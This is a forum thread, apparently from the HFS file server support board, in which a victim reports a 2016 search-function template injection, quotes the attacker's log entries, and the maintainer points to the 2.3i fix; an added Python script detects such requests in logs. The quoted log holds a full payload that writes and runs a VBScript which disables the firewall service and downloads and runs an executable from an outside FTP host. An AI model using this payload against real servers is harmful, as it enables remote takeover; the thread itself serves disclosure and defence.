Topic: Execution Exploit in search function

apanx (Occasional poster, Posts: 1)
Execution Exploit in search function
« on: June 14, 2016, 09:18:05 PM »
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a VBScript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and am waiting for a fix.

Code:
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell""):objshell.run(""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*43.160.195.78>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum
https://www.exploit-db.com/exploits/34668/
« Last Edit: June 14, 2016, 09:33:00 PM by apanx »
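The log lines above show the two things a defender can key on when reviewing HFS logs for this kind of request: a NUL byte following the search parameter, and HFS template-macro syntax ({.name|arg|arg.}) inside a query string, where it never belongs. The following script is an added example written for this thread, not part of HFS or of the poster's material. It assumes the 2.3-style log line shape visible above (date, time, client IP, port, "Requested METHOD path") and runs over a few constructed sample lines, with percent-encoded variants decoded before inspection so that %00 and %7B are not missed.

```python
import re
from urllib.parse import unquote

# Assumed HFS 2.3 log line shape, taken from the lines quoted in the thread:
#   "<date> <time> <client-ip> <port> Requested <METHOD> <path>"
# "Served ..." lines do not match and are skipped.
LOG_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<ip>\S+) (?P<port>\d+) Requested (?P<method>[A-Z]+) (?P<path>.*)$"
)

# HFS template macros look like {.name|arg|arg.}; capture the macro name.
MACRO_NAME_RE = re.compile(r"\{\.([A-Za-z_]+)")


def parse_request(line):
    """Return the fields of a 'Requested' log line, or None for other lines."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flags_for(path):
    """Return indicators found in a request path (empty list if none).

    The path is percent-decoded first so that %00 and %7B.  (an encoded
    '{.') are examined in the same form HFS would see them.
    """
    decoded = unquote(path)
    flags = []
    if "\x00" in decoded:
        flags.append("nul-byte")
    if "{." in decoded:
        flags.append("template-macro")
    return flags


def macro_names(path):
    """List the macro names ({.save ..., {.exec ...) present in a path."""
    return MACRO_NAME_RE.findall(unquote(path))


def scan(lines):
    """Scan HFS log lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        req = parse_request(line)
        if req is None:
            continue
        flags = flags_for(req["path"])
        if flags:
            hits.append({
                "time": f'{req["date"]} {req["time"]}',
                "ip": req["ip"],
                "flags": flags,
                "macros": macro_names(req["path"]),
            })
    return hits


# Constructed sample log lines (documentation-range IPs, shortened payloads);
# they mimic the format of the thread's log but are not the original entries.
SAMPLE_LOG = [
    "2016-06-13 15:58:50 203.0.113.5 1739 Requested GET /?search=report",
    "2016-06-13 15:58:52 203.0.113.9 1740 Requested GET /?search==\x00{.save|6.vbs|x.}",
    "2016-06-13 15:58:52 203.0.113.9 1740 Served 3.9 K",
    "2016-06-13 15:58:52 203.0.113.9 1740 Requested GET /?search==%00%7B.exec%7C6.vbs%7C.%7D",
    "2016-06-13 15:59:01 203.0.113.7 1741 Requested GET /docs/{readme}.txt",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} flags={hit["flags"]} macros={hit["macros"]}')
```

Both the raw-NUL request and its percent-encoded twin are reported, while the ordinary search and the path that merely contains braces are not; the reported macro names (save, exec) are what to look for in the HFS folder afterwards, alongside applying the 2.3i update the maintainer points to below in the thread.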

Mars (Operator, Tireless poster, Posts: 1842)
Re: Execution Exploit in search function
« Reply #1 on: June 14, 2016, 09:59:59 PM »
Thanks for the report, rejetto is beginning to address the issue

rejetto (Administrator, Tireless poster, Posts: 12888)
Re: Execution Exploit in search function
« Reply #2 on: June 14, 2016, 10:13:37 PM »
I'm sorry for the problem.
I'm working on it.

rejetto (Administrator, Tireless poster, Posts: 12888)
Re: Execution Exploit in search function
« Reply #3 on: June 14, 2016, 10:58:23 PM »
please update to 2.3i

Fysack (Tireless poster, Posts: 590)
Re: Execution Exploit in search function
« Reply #4 on: September 30, 2017, 11:19:40 PM »
;D ;D ;D
GOD CAN READ YOUR MIND